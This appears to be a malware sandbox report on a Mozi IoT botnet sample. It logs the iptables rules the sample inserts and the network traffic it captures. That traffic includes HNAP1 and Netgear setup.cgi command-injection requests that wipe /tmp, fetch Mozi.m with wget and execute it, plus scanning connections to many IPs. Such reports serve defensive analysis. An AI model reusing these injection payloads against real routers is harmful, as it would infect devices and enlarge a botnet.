Source: /bin/sh (PID: 6857)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6863)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6897)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6913)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6935)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6948)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6973)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 47453 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 6992)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 6995)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 6998)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7010)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7067)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7093)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7122)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7145)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7163)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7179)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7200)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7216)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7230)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7248)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7261)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7290)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP			Jump to behavior
Source: /bin/sh (PID: 7316)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7319)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7327)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7351)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7378)	Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7405)	Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7426)	Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 4000 -j ACCEPT			Jump to behavior
Source: /bin/sh (PID: 7439)	Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 4000 -j ACCEPT			Jump to behavior

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 221.128.175.114:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 52.54.104.1:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 175.119.69.229:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</I
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 112.74.206.52:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic	HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

Connects to IPs without corresponding DNS lookups

Source: unknown	TCP traffic detected without corresponding DNS query: 5.89.214.135
Source: unknown	TCP traffic detected without corresponding DNS query: 149.185.53.154
Source: unknown	TCP traffic detected without corresponding DNS query: 155.61.123.253
Source: unknown	TCP traffic detected without corresponding DNS query: 184.217.35.73
Source: unknown	TCP traffic detected without corresponding DNS query: 105.137.202.218
Source: unknown	TCP traffic detected without corresponding DNS query: 99.37.65.129
Source: unknown	TCP traffic detected without corresponding DNS query: 175.141.183.193
Source: unknown	TCP traffic detected without corresponding DNS query: 84.60.151.77
Source: unknown	TCP traffic detected without corresponding DNS query: 132.169.224.240
Source: unknown	TCP traffic detected without corresponding DNS query: 207.49.85.172
Source: unknown	TCP traffic detected without corresponding DNS query: 101.215.138.244
Source: unknown	TCP traffic detected without corresponding DNS query: 146.159.89.38
Source: unknown	TCP traffic detected without corresponding DNS query: 141.139.161.123
Source: unknown	TCP traffic detected without corresponding DNS query: 217.128.81.132
Source: unknown	TCP traffic detected without corresponding DNS query: 102.211.48.37
Source: unknown	TCP traffic detected without corresponding DNS query: 190.180.20.21
Source: unknown	TCP traffic detected without corresponding DNS query: 97.152.141.58
Source: unknown	TCP traffic detected without corresponding DNS query: 132.35.122.63
Source: unknown	TCP traffic detected without corresponding DNS query: 206.66.211.183
Source: unknown	TCP traffic detected without corresponding DNS query: 41.22.25.103
Source: unknown	TCP traffic detected without corresponding DNS query: 5.69.78.55
Source: unknown	TCP traffic detected without corresponding DNS query: 79.186.143.177
Source: unknown	TCP traffic detected without corresponding DNS query: 109.147.241.154
Source: unknown	TCP traffic detected without corresponding DNS query: 138.58.82.192
Source: unknown	TCP traffic detected without corresponding DNS query: 50.41.174.31
Source: unknown	TCP traffic detected without corresponding DNS query: 205.51.46.8
Source: unknown	TCP traffic detected without corresponding DNS query: 17.143.195.16
Source: unknown	TCP traffic detected without corresponding DNS query: 70.97.76.208
Source: unknown	TCP traffic detected without corresponding DNS query: 85.233.216.179
Source: unknown	TCP traffic detected without corresponding DNS query: 193.176.243.123
Source: unknown	TCP traffic detected without corresponding DNS query: 209.136.182.147
Source: unknown	TCP traffic detected without corresponding DNS query: 59.17.48.95
Source: unknown	TCP traffic detected without corresponding DNS query: 176.127.83.100
Source: unknown	TCP traffic detected without corresponding DNS query: 52.176.185.219
Source: unknown	TCP traffic detected without corresponding DNS query: 163.49.20.154
Source: unknown	TCP traffic detected without corresponding DNS query: 34.144.108.84
Source: unknown	TCP traffic detected without corresponding DNS query: 180.191.141.165
Source: unknown	TCP traffic detected without corresponding DNS query: 133.183.45.107
Source: unknown	TCP traffic detected without corresponding DNS query: 217.32.46.116
Source: unknown	TCP traffic detected without corresponding DNS query: 43.163.194.108
Source: unknown	TCP traffic detected without corresponding DNS query: 55.92.128.187
Source: unknown	TCP traffic detected without corresponding DNS query: 221.38.227.70
Source: unknown	TCP traffic detected without corresponding DNS query: 73.227.59.34
Source: unknown	TCP traffic detected without corresponding DNS query: 1.86.24.162
Source: unknown	TCP traffic detected without corresponding DNS query: 117.145.177.145
Source: unknown	TCP traffic detected without corresponding DNS query: 132.134.9.26
Source: unknown	TCP traffic detected without corresponding DNS query: 124.193.58.88
Source: unknown	TCP traffic detected without corresponding DNS query: 166.131.20.168
Source: unknown	TCP traffic detected without corresponding DNS query: 7.175.103.180
Source: unknown	TCP traffic detected without corresponding DNS query: 207.100.187.60

Tries to download or post to a non-existing HTTP route (HTTP/1.1 404 Not Found / 503 Service Unavailable / 403 Forbidden)

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Nov 2021 14:45:14 GMTServer: Apache/2.4.51 (cPanel) OpenSSL/1.1.1l mod_bwlimited/1.4Content-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: no-cache, no-storeContent-Type: text/html; charset=utf-8Via: 1.1 spaces-router (e3eb0c1553be)Date: Tue, 16 Nov 2021 14:46:52 GMTContent-Length: 549Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 20 73 75 63 68 20 61 70 70 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 72 63 3d 22 2f 2f 77 77 77 2e 68 65 72 6f 6b 75 63 64 6e 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 73 2f 6e 6f 2d 73 75 63 68 2d 61 70 70 2e 68 74 6d 6c 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html> <head> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta charset="utf-8"> <title>No such app</title> <style media="screen"> html,body,iframe { margin: 0; padding: 0; } html,body { height: 100%; overflow: hidden; } iframe { width: 100%; height: 100%; border: 0; } </style> </head> <body> <iframe src="//www.herokucdn.com/error-pages/no-such-app.html"></iframe> </body></html>
